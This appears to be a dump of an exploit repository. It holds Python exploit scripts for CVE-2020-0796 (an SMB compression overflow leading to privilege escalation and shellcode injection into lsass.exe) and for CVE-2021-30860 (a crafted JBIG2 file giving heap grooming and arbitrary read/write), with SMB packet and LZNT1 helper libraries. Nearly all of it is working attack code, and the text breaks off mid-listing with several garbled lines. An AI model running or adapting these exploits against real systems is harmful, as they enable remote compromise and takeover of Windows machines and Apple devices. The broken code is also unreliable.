├── .gitignore ├── CVE-2020-0796 ├── exploit.py └── libs │ ├── lznt1.py │ └── smb.py ├── CVE-2021-30860 └── exploit.py ├── CVE-2021-31166 ├── README.md ├── exploit.py └── libs │ ├── lznt1.py │ └── smb.py ├── README.md └── libs └── win_lpe.py /.gitignore: -------------------------------------------------------------------------------- 1 | */private/ 2 | */.venv/ 3 | */.DS_Store 4 | */libs/__pycache__ 5 | 6 | libs/__pycache__ 7 | private/ 8 | .DS_Store -------------------------------------------------------------------------------- /CVE-2020-0796/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import os, socket, struct, sys 4 | from libs import lznt1, smb 5 | 6 | # import shared exploit libs 7 | sys.path.append(os.path.abspath(os.path.join('..'))) 8 | from libs import win_lpe as lpe 9 | 10 | def send(s, pkt): 11 | s.send(pkt) 12 | 13 | 14 | def recv(s): 15 | nb, = struct.unpack(">I", s.recv(4)) 16 | return s.recv(nb) 17 | 18 | 19 | def send_and_recv(s, pkt): 20 | s.send(pkt) 21 | return recv(s) 22 | 23 | 24 | def set_up_socket(ip, port=445, timeout=5): 25 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | s.settimeout(timeout) 27 | s.connect((ip, port)) 28 | return s 29 | 30 | 31 | def get_what_where_LPE(): 32 | # explained in detail here: https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt 33 | 34 | # _TOKEN structure contains _SEP_TOKEN_PRIVILEGES at pToken + 0x40 35 | # ulonglong Present (pToken + 0x40) indicates which privileges exist 36 | # ulonglong Enabled (pToken + 0x48) indicates which privileges are enabled 37 | # ulonglong EnabledByDefault (pToken + 0x50) indicates initial state of the token 38 | 39 | addr = lpe.leak_process_token_addr() 40 | if not addr: exit(-1) 41 | # all privs exist, enabled, and enabled by default 42 | priv_bitmask = (0xFFFFFFFFFFFFFFFF >> 0x1E) << 2 43 | priv_bitmask = struct.pack(" 0x1100: 48 | print("Payload must be larger than 1 byte and smaller than 0x1100 bytes") 49 | exit(-1) 50 | 51 | # 0xffffffff + len(what) = len(what) - 1 52 | # SrvNetAlloocateBuffer of len(what) -1, this is not true allocation size though 53 | # compressed_data is decompressed and placed at buf + len("what") (OOB write) 54 | # "what" is copied to a pointer that we can control with the OOB write 55 | # for a write what where. 56 | 57 | # memory is allocated in pools, lowest size pool is 0x1100 58 | # overwrite padding + into header to change address for memcpy 59 | pad = b"A" * (0x1118 - len(what)) 60 | uncompressed_data = pad + struct.pack(" 2: 110 | print("Usage: exploit.py [IP]\nIf IP is omitted, LPE is attempted.") 111 | exit(-1) 112 | if len(sys.argv) == 2: 113 | ip = sys.argv[1] 114 | print(f"CVE-2020-0796 RCE payload => {ip}") 115 | exit() 116 | s = set_up_socket(ip) 117 | write_what_where(s, b"A" * 0x8, 0xDEADBEEFCAFEBABE) 118 | else: 119 | print(f"CVE-2020-0796 LPE payload") 120 | s = set_up_socket("127.0.0.1") 121 | what, where = get_what_where_LPE() 122 | write_what_where(s, what, where) 123 | victim_process = "lsass.exe" 124 | print("[+] Used write what where to modify token privileges") 125 | print(f"[+] injecting shellcode into {victim_process}") 126 | lpe.inject_shellcode_into_process(buf, victim_process) 127 | #lpe.trigger_printer_bug() 128 | #lpe.se_impersonate_privilege_and_printer_bug(shellcode) 129 | #os.system('cmd.exe') 130 | 131 | # useful windbg commands 132 | # .reload; bp srv2!Srv2DecompressData+0x108; g; r rcx; db rdx; g; gN; g; 133 | # .reload; bp srv2!Srv2DecompressData+0x108; g; r rcx; db rdx; 134 | # g; r rcx; db rdx; -------------------------------------------------------------------------------- /CVE-2020-0796/libs/lznt1.py: -------------------------------------------------------------------------------- 1 | 2 | import struct 3 | import sys 4 | import copy 5 | 6 | def _decompress_chunk(chunk): 7 | out = bytes() 8 | while chunk: 9 | flags = ord(chunk[0:1]) 10 | chunk = chunk[1:] 11 | for i in range(8): 12 | if not (flags >> i & 1): 13 | out += chunk[0:1] 14 | chunk = chunk[1:] 15 | else: 16 | flag = struct.unpack('= 0x10: 21 | l_mask >>= 1 22 | o_shift -= 1 23 | pos >>= 1 24 | 25 | length = (flag & l_mask) + 3 26 | offset = (flag >> o_shift) + 1 27 | 28 | if length >= offset: 29 | tmp = out[-offset:] * int(0xFFF / len(out[-offset:]) + 1) 30 | out += tmp[:length] 31 | else: 32 | out += out[-offset:-offset+length] 33 | chunk = chunk[2:] 34 | if len(chunk) == 0: 35 | break 36 | return out 37 | 38 | def decompress(buf, length_check=True): 39 | out = bytes() 40 | while buf: 41 | header = struct.unpack(' len(buf[2:]): 44 | raise ValueError('invalid chunk length') 45 | else: 46 | chunk = buf[2:2+length] 47 | if header & 0x8000: 48 | out += _decompress_chunk(chunk) 49 | else: 50 | out += chunk 51 | buf = buf[2+length:] 52 | 53 | return out 54 | 55 | def _find(src, target, max_len): 56 | result_offset = 0 57 | result_length = 0 58 | for i in range(1, max_len): 59 | offset = src.rfind(target[:i]) 60 | if offset == -1: 61 | break 62 | tmp_offset = len(src) - offset 63 | tmp_length = i 64 | if tmp_offset == tmp_length: 65 | tmp = src[offset:] * int(0xFFF / len(src[offset:]) + 1) 66 | for j in range(i, max_len+1): 67 | offset = tmp.rfind(target[:j]) 68 | if offset == -1: 69 | break 70 | tmp_length = j 71 | if tmp_length > result_length: 72 | result_offset = tmp_offset 73 | result_length = tmp_length 74 | 75 | if result_length < 3: 76 | return 0, 0 77 | return result_offset, result_length 78 | 79 | def _compress_chunk(chunk): 80 | blob = copy.copy(chunk) 81 | out = bytes() 82 | pow2 = 0x10 83 | l_mask3 = 0x1002 84 | o_shift = 12 85 | while len(blob) > 0: 86 | bits = 0 87 | tmp = bytes() 88 | for i in range(8): 89 | bits >>= 1 90 | while pow2 < (len(chunk) - len(blob)): 91 | pow2 <<= 1 92 | l_mask3 = (l_mask3 >> 1) + 1 93 | o_shift -= 1 94 | if len(blob) < l_mask3: 95 | max_len = len(blob) 96 | else: 97 | max_len = l_mask3 98 | 99 | offset, length = _find(chunk[:len(chunk) - len(blob)], blob, max_len) 100 | 101 | # try to find more compressed pattern 102 | offset2, length2 = _find(chunk[:len(chunk) - len(blob)+1], blob[1:], max_len) 103 | if length < length2: 104 | length = 0 105 | 106 | if length > 0: 107 | symbol = ((offset-1) << o_shift) | (length - 3) 108 | tmp += struct.pack('> (7 - i)) 118 | out += tmp 119 | 120 | return out 121 | 122 | def compress(buf, chunk_size=0x1000): 123 | out = bytes() 124 | while buf: 125 | chunk = buf[:chunk_size] 126 | compressed = _compress_chunk(chunk) 127 | if len(compressed) < len(chunk): # chunk is compressed 128 | flags = 0xB000 129 | header = struct.pack('I",len(data)) 74 | self.data = data 75 | self.bytes = self.size + self.data 76 | 77 | def raw(self): 78 | return self.size + self.data 79 | 80 | 81 | class SMBSessionSetup: 82 | SECURITY_BLOB = b"\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x31\x90\x88\xe2" \ 83 | b"\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00" \ 84 | b"\x06\x01\xb1\x1d\x00\x00\x00\x0f" 85 | 86 | def __init__(self, flags, security_mode, capabilities, channel, blob_offset, 87 | blob_length, previous_session_id, security_blob): 88 | self.structure_size = b"\x19\x00" 89 | self.flags = flags 90 | self.security_mode = security_mode 91 | self.capabilities = capabilities 92 | self.channel = channel 93 | self.previous_session_id = previous_session_id 94 | self.blob_offset = blob_offset 95 | self.blob_length = blob_length 96 | self.security_blob = security_blob 97 | 98 | def raw(self): 99 | return self.structure_size + self.flags + self.security_mode + self.capabilities + \ 100 | self.channel + self.blob_offset + self.blob_length + self.previous_session_id + \ 101 | self.security_blob 102 | 103 | 104 | class SMBCompressionTransformHeader: 105 | def __init__(self, protocol_id, original_size, compression_algorithm, reserve, offset): 106 | self.protocol_id = protocol_id 107 | self.original_size = original_size 108 | self.compression_algorithm = compression_algorithm 109 | self.reserve = reserve 110 | self.offset = offset 111 | 112 | def raw(self): 113 | return self.protocol_id + self.original_size + self.compression_algorithm + \ 114 | self.reserve + self.offset 115 | 116 | 117 | ######################################## 118 | # Packet contructors 119 | ######################################## 120 | 121 | def CrashPacket(): 122 | # data is necessary for crash 123 | data = b'A' * 0xffff 124 | h = SMBCompressionTransformHeader( 125 | b"\xfc\x53\x4d\x42", # protocol_id 126 | struct.pack("I", self.seg_num) + \ 15 | struct.pack("B", self.seg_flags) + \ 16 | struct.pack("B", self.ref_flags) + \ 17 | struct.pack("B", self.page) + \ 18 | struct.pack(">I", self.seg_length) 19 | 20 | 21 | class segmentHeaderWithRefSegs: 22 | def __init__(self, seg_num, seg_flags, ref_flags, ref_segs, page, seg_length): 23 | self.seg_num = seg_num 24 | self.seg_flags = seg_flags 25 | self.ref_flags = ref_flags 26 | self.ref_segs = ref_segs 27 | self.page = page 28 | self.seg_length = seg_length 29 | 30 | def raw(self): 31 | return struct.pack(">I", self.seg_num) + \ 32 | struct.pack("B", self.seg_flags) + \ 33 | struct.pack("B", self.ref_flags) + \ 34 | self.ref_segs + \ 35 | struct.pack("B", self.page) + \ 36 | struct.pack(">I", self.seg_length) 37 | 38 | 39 | class segmentHeaderWithRefSegsLarge: 40 | def __init__(self, seg_num, seg_flags, ref_flags, ref_segs, page, seg_length): 41 | self.seg_num = seg_num 42 | self.seg_flags = seg_flags 43 | self.ref_flags = ref_flags 44 | self.ref_segs = ref_segs 45 | self.page = page 46 | self.seg_length = seg_length 47 | 48 | def raw(self): 49 | return struct.pack(">I", self.seg_num) + \ 50 | struct.pack("B", self.seg_flags) + \ 51 | struct.pack(">I", self.ref_flags) + \ 52 | self.ref_segs + \ 53 | struct.pack("B", self.page) + \ 54 | struct.pack(">I", self.seg_length) 55 | 56 | 57 | class symbolDictionarySegment: 58 | def __init__(self, flags, sd_atx, sd_aty, num_ex_syms, num_new_syms, decoder_bytes): 59 | self.flags = flags 60 | self.sd_atx = sd_atx 61 | self.sd_aty = sd_aty 62 | self.num_ex_syms = num_ex_syms 63 | self.num_new_syms = num_new_syms 64 | self.decoder_bytes = decoder_bytes 65 | 66 | def raw(self): 67 | return struct.pack(">H", self.flags) + \ 68 | struct.pack("B", self.sd_atx[0]) + \ 69 | struct.pack("B", self.sd_aty[0]) + \ 70 | struct.pack("B", self.sd_atx[1]) + \ 71 | struct.pack("B", self.sd_aty[1]) + \ 72 | struct.pack("B", self.sd_atx[2]) + \ 73 | struct.pack("B", self.sd_aty[2]) + \ 74 | struct.pack("B", self.sd_atx[3]) + \ 75 | struct.pack("B", self.sd_aty[3]) + \ 76 | struct.pack(">I", self.num_ex_syms) + \ 77 | struct.pack(">I", self.num_new_syms) + \ 78 | self.decoder_bytes 79 | 80 | 81 | class refAggSymbolDictionarySegment: 82 | def __init__(self, flags, sd_atx, sd_aty, sdr_atx, sdr_aty, num_ex_syms, num_new_syms, decoder_bytes): 83 | self.flags = flags 84 | self.sd_atx = sd_atx 85 | self.sd_aty = sd_aty 86 | self.sdr_atx = sdr_atx 87 | self.sdr_aty = sdr_aty 88 | self.num_ex_syms = num_ex_syms 89 | self.num_new_syms = num_new_syms 90 | self.decoder_bytes = decoder_bytes 91 | 92 | def raw(self): 93 | return struct.pack(">H", self.flags) + \ 94 | struct.pack("B", self.sd_atx[0]) + \ 95 | struct.pack("B", self.sd_aty[0]) + \ 96 | struct.pack("B", self.sd_atx[1]) + \ 97 | struct.pack("B", self.sd_aty[1]) + \ 98 | struct.pack("B", self.sd_atx[2]) + \ 99 | struct.pack("B", self.sd_aty[2]) + \ 100 | struct.pack("B", self.sd_atx[3]) + \ 101 | struct.pack("B", self.sd_aty[3]) + \ 102 | struct.pack("B", self.sdr_atx[0]) + \ 103 | struct.pack("B", self.sdr_aty[0]) + \ 104 | struct.pack("B", self.sdr_atx[1]) + \ 105 | struct.pack("B", self.sdr_aty[1]) + \ 106 | struct.pack(">I", self.num_ex_syms) + \ 107 | struct.pack(">I", self.num_new_syms) + \ 108 | self.decoder_bytes 109 | 110 | 111 | 112 | 113 | class pageInfoSegment: 114 | def __init__(self, page_w, page_h, x_res, y_res, flags, striping): 115 | self.page_w = page_w 116 | self.page_h = page_h 117 | self.x_res = x_res 118 | self.y_res = y_res 119 | self.flags = flags 120 | self.striping = striping 121 | 122 | def raw(self): 123 | return struct.pack(">I", self.page_w) + \ 124 | struct.pack(">I", self.page_h) + \ 125 | struct.pack(">I", self.x_res) + \ 126 | struct.pack(">I", self.y_res) + \ 127 | struct.pack("B", self.flags) + \ 128 | struct.pack(">H", self.striping) 129 | 130 | 131 | class textRegionSegment: 132 | def __init__(self, w, h, x, y, seg_info_flags, flags, num_instances, decoder_bytes): 133 | self.w = w 134 | self.h = h 135 | self.x = x 136 | self.y = y 137 | self.seg_info_flags = seg_info_flags 138 | self.flags = flags 139 | self.num_instances = num_instances 140 | self.decoder_bytes = decoder_bytes 141 | 142 | def raw(self): 143 | return struct.pack(">I", self.w) + \ 144 | struct.pack(">I", self.h) + \ 145 | struct.pack(">I", self.x) + \ 146 | struct.pack(">I", self.y) + \ 147 | struct.pack("B", self.seg_info_flags) + \ 148 | struct.pack(">H", self.flags) + \ 149 | struct.pack(">I", self.num_instances) + \ 150 | self.decoder_bytes 151 | 152 | 153 | class genericRefinementRegionSegment: 154 | def __init__(self, w, h, x, y, seg_info_flags, flags, sd_atx, sd_aty, decoder_bytes): 155 | self.w = w 156 | self.h = h 157 | self.x = x 158 | self.y = y 159 | self.seg_info_flags = seg_info_flags 160 | self.flags = flags 161 | self.sd_atx = sd_atx 162 | self.sd_aty = sd_aty 163 | self.decoder_bytes = decoder_bytes 164 | 165 | def raw(self): 166 | if self.flags & 1 == 1: 167 | # templ on, atx/aty not read 168 | return struct.pack(">I", self.w) + \ 169 | struct.pack(">I", self.h) + \ 170 | struct.pack(">I", self.x) + \ 171 | struct.pack(">I", self.y) + \ 172 | struct.pack("B", self.seg_info_flags) + \ 173 | struct.pack("B", self.flags) + \ 174 | self.decoder_bytes 175 | else: 176 | return struct.pack(">I", self.w) + \ 177 | struct.pack(">I", self.h) + \ 178 | struct.pack(">I", self.x) + \ 179 | struct.pack(">I", self.y) + \ 180 | struct.pack("B", self.seg_info_flags) + \ 181 | struct.pack("B", self.flags) + \ 182 | struct.pack("B", self.sd_atx[0]) + \ 183 | struct.pack("B", self.sd_aty[0]) + \ 184 | struct.pack("B", self.sd_atx[1]) + \ 185 | struct.pack("B", self.sd_aty[1]) + \ 186 | self.decoder_bytes 187 | 188 | 189 | def or_bytes_at_offset(f, bytez, offset): 190 | bits = 0 191 | for byte in bytez: 192 | for bit in format(byte, "08b"): 193 | # encode 1 bit 194 | data_bytes = b"\xff\x7f\xff\xac" 195 | if bit == "0": 196 | # encode 0 bit 197 | data_bytes = b"\x7f\xff\xac" 198 | # w, h, x, y, seg_info_flags, flags, sd_atx, sd_aty, decoder_bytes 199 | grrs = genericRefinementRegionSegment(0x1, 0x1, (offset << 3) + bits, 0, OR, 0, [0,0], [0,0], data_bytes) 200 | grrs_sh = segmentHeader(0xffffffff, 0x2A, 0, 1, len(grrs.raw())) 201 | f.write(grrs_sh.raw() + grrs.raw()) 202 | bits += 1 203 | 204 | 205 | def and_bytes_at_offset(f, bytez, offset): 206 | bits = 0 207 | for byte in bytez: 208 | for bit in format(byte, "08b"): 209 | # encode 1 bit 210 | data_bytes = b"\xff\x7f\xff\xac" 211 | if bit == "0": 212 | # encode 0 bit 213 | data_bytes = b"\x7f\xff\xac" 214 | 215 | grrs = genericRefinementRegionSegment(0x1, 0x1, (offset << 3) + bits, 0, AND, 0, [0,0], [0,0], data_bytes) 216 | grrs_sh = segmentHeader(0xffffffff, 0x2A, 0, 1, len(grrs.raw())) 217 | f.write(grrs_sh.raw() + grrs.raw()) 218 | bits += 1 219 | 220 | 221 | def replace_bytes_at_offset(f, bytez, offset): 222 | bits = 0 223 | for byte in bytez: 224 | for bit in format(byte, "08b"): 225 | # encode 1 bit 226 | data_bytes = b"\xff\x7f\xff\xac" 227 | if bit == "0": 228 | # encode 0 bit 229 | data_bytes = b"\x7f\xff\xac" 230 | 231 | grrs = genericRefinementRegionSegment(0x1, 0x1, (offset << 3) + bits, 0, REPLACE, 0, [0,0], [0,0], data_bytes) 232 | grrs_sh = segmentHeader(0xffffffff, 0x2A, 0, 1, len(grrs.raw())) 233 | f.write(grrs_sh.raw() + grrs.raw()) 234 | bits += 1 235 | 236 | # offsets 237 | data_buffer_to_segments = 0x3B0 238 | data_buffer_to_bitmap = 0x4b0 239 | data_buffer_to_known_good_bitmap = 0x4d0 240 | data_buffer_to_bitmap_w = data_buffer_to_bitmap + 0x8 + 0x4 241 | data_buffer_to_bitmap_h = data_buffer_to_bitmap + 0x8 + 0x8 242 | data_buffer_to_bitmap_line = data_buffer_to_bitmap + 0x8 + 0xc 243 | data_buffer_to_bitmap_data = data_buffer_to_bitmap + 0x8 + 0x10 244 | data_buffer_to_known_good_sds = 0x6c0 245 | 246 | spoofed_bitmap_segnum = 0x8 247 | spoofed_bitmap_w = 0xc 248 | spoofed_bitmap_h = 0x10 249 | spoofed_bitmap_line = 0x14 250 | spoofed_bitmap_data = 0x18 251 | 252 | spoofed_vtable = 0x68 253 | 254 | spoofed_sds = 0x48 255 | spoofed_sds_segnum = spoofed_sds + 0x8 256 | spoofed_sds_size = spoofed_sds + 0xc 257 | spoofed_sds_bitmaps = spoofed_sds + 0x10 258 | 259 | spoofed_sds_bitmaps_pointer = 0x60 260 | 261 | flags = 0x20 262 | rax = 0x28 263 | rbx = 0x30 264 | rcx = 0x38 265 | rdx = 0x40 266 | 267 | rax_high = 0x2c 268 | rbx_high = 0x34 269 | rcx_high = 0x3c 270 | rdx_high = 0x44 271 | 272 | eax = 0x28 273 | ebx = 0x30 274 | ecx = 0x38 275 | edx = 0x40 276 | 277 | 278 | # bitwise operations 279 | OR = 0 280 | AND = 1 281 | XOR = 2 282 | XNOR = 3 283 | REPLACE = 4 284 | 285 | # segment list operations in readGenericReginementSeg 286 | COMBINE = 0x2a 287 | STORE = 0x28 288 | 289 | # bit to write when discarding, don't care about its value 290 | garbage_bit = (0x27 << 3) + 7 291 | sum_half_adder_bit = (0x20 << 3) 292 | carry_bit = (0x20 << 3) + 1 293 | carry_half_adder_bit = (0x20 << 3) + 2 294 | 295 | """ 296 | Fake JBIG2Bitmap: red 297 | EFLAGS: blue 298 | RAX: purple 299 | RBX: green 300 | RCX: pink 301 | RDX: orange 302 | 303 | registers 304 | 305 | General registers 306 | EAX EBX ECX EDX 307 | 308 | Segment registers 309 | CS DS ES FS GS SS 310 | 311 | Index and pointers 312 | ESI EDI EBP EIP ESP 313 | 314 | Indicator 315 | EFLAGS 316 | 317 | EFLAGS: 318 | Bit Label Desciption 319 | --------------------------- 320 | 0 CF Carry flag 321 | 2 PF Parity flag 322 | 4 AF Auxiliary carry flag 323 | 6 ZF Zero flag 324 | 7 SF Sign flag 325 | 8 TF Trap flag 326 | 9 IF Interrupt enable flag 327 | 10 DF Direction flag 328 | 11 OF Overflow flag 329 | 12-13 IOPL I/O Priviledge level 330 | 14 NT Nested task flag 331 | 16 RF Resume flag 332 | 17 VM Virtual 8086 mode flag 333 | 18 AC Alignment check flag (486+) 334 | 19 VIF Virutal interrupt flag 335 | 20 VIP Virtual interrupt pending flag 336 | 21 ID ID flag 337 | """ 338 | 339 | debug_sh = segmentHeader(0xffffffff, 0x34, 0, 1, 0) 340 | final_debug_sh = segmentHeader(0xffffffff, 0x3E, 0, 1, 0) 341 | toggle_debug_sh = segmentHeader(0xffffffff, 0x32, 0, 1, 0) 342 | 343 | 344 | 345 | def unbound_page(f): 346 | # needed to appease some sanity check, swap out the page anyway later 347 | pis = pageInfoSegment(1, 1, 0, 0, 0, 0) 348 | pis_sh = segmentHeader(0xffffffff, 0x30, 0, 1, len(pis.raw())) 349 | f.write(pis_sh.raw() + pis.raw()) 350 | 351 | # dictionary seg 352 | mal_sds = symbolDictionarySegment( 353 | 0, 354 | [0x03,0xFD,0x02,0xFE], 355 | [0xFF,0xFF,0xFE,0xFE], 356 | 0xFFFF, 357 | 0xFFFF, 358 | b"\x94\x4f\x06\x7b\xff\x7f\xff\x7f\xff\x7f\xff\x7d\xd3\x26\xa8\x9d\x6c\xb0\xee\x7f\xff\xac" 359 | ) 360 | mal_sds_sh = segmentHeader(1, 0, 1, 0, len(mal_sds.raw())) 361 | f.write(mal_sds_sh.raw() + mal_sds.raw()) 362 | 363 | # force 1Q mallocs to eat up all the free space 364 | for i in range(1, 0x10000): 365 | pis = pageInfoSegment(0x71, 1, 0, 0, 0, 0) 366 | pis_sh = segmentHeader(0xffffffff, 0x30, 0, 1, len(pis.raw())) 367 | f.write(pis_sh.raw() + pis.raw()) 368 | 369 | # set up segments Glist for resizing (reallocation) 370 | for i in range(0, 0xF): 371 | sds = symbolDictionarySegment(0, [0x03,0xFD,0x02,0xFE], [0xFF,0xFF,0xFE,0xFE], 1, 1, b"\x93\xFC\x7F\xFF\xAC") 372 | sds_sh = segmentHeader(2, 0, 1, 0, len(sds.raw())) 373 | f.write(sds_sh.raw() + sds.raw()) 374 | 375 | # allocate 0x80, 0x80, and 0x40 in that order 376 | sds = symbolDictionarySegment(0, 377 | [0x03,0xFD,0x02,0xFE], 378 | [0xFF,0xFF,0xFE,0xFE], 379 | 3, 380 | 3, 381 | b"\x13\xb0\xb7\xcf\x36\xb1\x68\xbf\xff\xac") 382 | sds_sh = segmentHeader(3, 0, 1, 0, len(sds.raw())) 383 | f.write(sds_sh.raw() + sds.raw()) 384 | 385 | # consume some freed blocks 386 | for i in range(0, 1): 387 | pis = pageInfoSegment(0x71, 1, 0, 0, 0, 0) 388 | pis_sh = segmentHeader(0xffffffff, 0x30, 0, 1, len(pis.raw())) 389 | f.write(pis_sh.raw() + pis.raw()) 390 | 391 | # allocate page that will be exploited 392 | # 0x3F1 results in a malloc of 0x80 for the buffer, should reclaim from cache 393 | pis = pageInfoSegment(0x3F1, 1, 0, 0, 0, 0) 394 | pis_sh = segmentHeader(4, 0x30, 0, 1, len(pis.raw())) 395 | f.write(pis_sh.raw() + pis.raw()) 396 | 397 | # trigger the vuln and create a bitmap directly after triggering, will steal vtable for arbitrary read 398 | trs = textRegionSegment(1, 1, 0, 0, 0, 0, 1, b"\xA9\x43\xFF\xAC") 399 | ref_seg_bytes = (b"\xff" * 0x2D) + (b"\x02" * 0xFFD2) + (0x10000 * b"\x01") + (b"\x02" * 1) + (b"\x02" * 0x2) 400 | pad = ((len(ref_seg_bytes) + 9) >> 3) * b"\x00" 401 | trs_sh = segmentHeaderWithRefSegsLarge(5, 402 | 0x4, 403 | 0xE0000000 + len(ref_seg_bytes), 404 | pad + ref_seg_bytes, 405 | 1, 406 | len(trs.raw()) 407 | ) 408 | f.write(trs_sh.raw() + trs.raw()) 409 | 410 | """ 411 | # testing, hope is to allocate an sds predictably for further faking 412 | # store segment of size 1 to increment syms buffer size granularly 413 | sds = symbolDictionarySegment(0, [0x03,0xFD,0x02,0xFE], [0xFF,0xFF,0xFE,0xFE], 1, 1, b"\x93\xFC\x7F\xFF\xAC") 414 | sds_sh = segmentHeader(0x9999, 0, 1, 0, len(sds.raw())) 415 | f.write(sds_sh.raw() + sds.raw()) 416 | """ 417 | #f.write(debug_sh.raw()) 418 | # end testing 419 | 420 | # fail a sanity check but set pageW and pageH to large values so subsequent reads will work 421 | pis = pageInfoSegment(0xffffffff, 0xfffffffe, 0, 0, 0, 0) 422 | pis_sh = segmentHeader(0xffffffff, 0x30, 0, 1, len(pis.raw())) 423 | f.write(pis_sh.raw() + pis.raw()) 424 | 425 | # overwrite pageBitmaps values to fully unbound operations 426 | # line is overwritten with -1 for now 427 | or_bytes_at_offset(f, struct.pack("I", 0xBADDAD), 1, len(grrs.raw())) 440 | f.write(grrs_sh.raw() + grrs.raw()) 441 | 442 | 443 | def op_from_offset_to_offset(f, num_bits, read_bit_offset, write_bit_offset, op): 444 | for i in range(num_bits): 445 | grrs = genericRefinementRegionSegment(0x1, 0x1, read_bit_offset + i, 0, 0, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 446 | grrs_sh = segmentHeader(0xBADDAD, STORE, 0, 1, len(grrs.raw())) 447 | f.write(grrs_sh.raw() + grrs.raw()) 448 | grrs = genericRefinementRegionSegment(0x1, 0x1, write_bit_offset + i, 0, op, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 449 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", 0xBADDAD), 1, len(grrs.raw())) 450 | f.write(grrs_sh.raw() + grrs.raw()) 451 | 452 | 453 | def discard_segment(f, seg_num): 454 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 455 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", seg_num), 1, len(grrs.raw())) 456 | f.write(grrs_sh.raw() + grrs.raw()) 457 | 458 | 459 | def flush_overflow_segments(f): 460 | for i in range(0, 0x11): 461 | # swap in 0x11 placeholders 462 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\x7f\xff\xac") 463 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 464 | f.write(grrs_sh.raw() + grrs.raw()) 465 | 466 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, AND, 2, [0,0], [0,0], b"\x7f\xff\xac") 467 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", 0x0), 1, len(grrs.raw())) 468 | f.write(grrs_sh.raw() + grrs.raw()) 469 | 470 | for i in range(0x11, 0x1f): 471 | # fill the rest of the list with placeholders 472 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\x7f\xff\xac") 473 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 474 | f.write(grrs_sh.raw() + grrs.raw()) 475 | # list is now 0x1f long, one segment left to do offset reads 476 | 477 | 478 | def read_bit_from_calculated_offset_to_offset(f, write_byte_offset, write_bit_offset): 479 | # list is now set up for rotating reads. 0x1f segments switched in 480 | # last pointer overwritten by every segment read, last bit is 0 because 481 | # of byte alignment, so not all 32 bits are needed. upper 32 bits don't 482 | # have to be changed 483 | 484 | for i in range(0, 0x1f): 485 | # consume placeholders, store bits of buffer address 486 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, REPLACE, 2, [0,0], [0,0], b"\x7f\xff\xac") 487 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", 0xc0ffee), 1, len(grrs.raw())) 488 | f.write(grrs_sh.raw() + grrs.raw()) 489 | 490 | grrs = genericRefinementRegionSegment(0x1, 0x1, ((data_buffer_to_bitmap_data + 3 - (i // 8)) << 3) + (i % 8), 0, 0, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 491 | grrs_sh = segmentHeader(0xcafe + i, STORE, 0, 1, len(grrs.raw())) 492 | f.write(grrs_sh.raw() + grrs.raw()) 493 | 494 | # append segment (brings list up to 0x20), will overwrite this pointer in the segment list 495 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\xff\x7f\xff\xac") 496 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 497 | f.write(grrs_sh.raw() + grrs.raw()) 498 | 499 | for i in range(0, 0x1f): 500 | # write buffer address into list 501 | grrs = genericRefinementRegionSegment(0x1, 0x1, (((data_buffer_to_segments + (0x8 * (0x1f - i))) + 0x3 - (i // 8) ) << 3) + (i % 8), 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 502 | #grrs = genericRefinementRegionSegment(0x1, 0x1, ((data_buffer_to_segments + (0x8 * (0x1f - i))) << 3) + i, 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 503 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", 0xcafe + i), 1, len(grrs.raw())) 504 | f.write(grrs_sh.raw() + grrs.raw()) 505 | 506 | # restore a placeholder 507 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\xff\x7f\xff\xac") 508 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 509 | f.write(grrs_sh.raw() + grrs.raw()) 510 | 511 | # trigger the write with the spoofed bitmap 512 | grrs = genericRefinementRegionSegment(0x1, 0x1, (write_byte_offset << 3) + write_bit_offset, 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 513 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", 0xdeadbeef), 1, len(grrs.raw())) 514 | f.write(grrs_sh.raw() + grrs.raw()) 515 | 516 | 517 | def read_from_calculated_offset_to_offset(f, num_bits, write_byte_offset, write_bit_offset): 518 | for i in range(0, num_bits): 519 | read_bit_from_calculated_offset_to_offset(f, write_byte_offset, i + write_bit_offset) 520 | 521 | 522 | def zero_page(f): 523 | # zero page 524 | for i in range(0, 0x80, 0x4): 525 | replace_bytes_at_offset(f, struct.pack(" rdx 650 | # set to 0x41 to test reading negative offsets 651 | replace_bytes_at_offset(f, struct.pack("I", 0xc0ffee), 1, 